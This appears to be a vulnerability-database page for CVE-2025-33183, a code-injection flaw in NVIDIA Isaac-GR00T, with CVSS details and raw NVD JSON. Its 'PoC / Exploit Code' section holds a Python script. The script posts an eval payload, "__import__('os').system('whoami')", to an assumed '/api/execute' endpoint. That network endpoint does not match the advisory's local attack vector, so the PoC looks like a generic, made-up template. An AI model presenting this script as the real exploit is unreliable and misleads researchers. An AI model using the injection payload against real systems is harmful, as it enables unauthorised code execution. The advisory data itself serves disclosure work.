Security Vulnerability Report
中文
CVE-2025-33183 CVSS 7.8 HIGH

CVE-2025-33183

Published: 2025-11-18 17:16:01
Last Modified: 2026-04-15 00:35:42

Description

NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component, where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NVIDIA Isaac-GR00T < 1.0.0 (all platforms)
NVIDIA Isaac-GR00T < 2025.1.0
All versions prior to security patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33183 PoC - NVIDIA Isaac-GR00T Code Injection # Note: This is a conceptual PoC for educational purposes only import requests import json def exploit_cve_2025_33183(target_url, payload): """ Exploit CVE-2025-33183: NVIDIA Isaac-GR00T Python Component Code Injection Args: target_url: URL of the vulnerable NVIDIA Isaac-GR00T endpoint payload: Malicious Python code to inject Returns: Response from the exploited endpoint """ headers = { 'Content-Type': 'application/json', 'User-Agent': 'NVIDIA-Isaac-GR00T-Client/1.0' } # Construct malicious payload exploit_data = { 'command': payload, 'target_component': 'python_engine', 'execution_mode': 'eval' } try: response = requests.post(target_url, json=exploit_data, headers=headers, timeout=10) return response.json() except Exception as e: return {'error': str(e)} # Example usage if __name__ == '__main__': target = 'http://target-system:8080/api/execute' # Malicious payload to execute system commands malicious_code = "__import__('os').system('whoami')" result = exploit_cve_2025_33183(target, malicious_code) print(f'Exploit result: {result}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33183", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:00.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component, where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33183", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5725", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33183", "source": "[email protected]"}]}}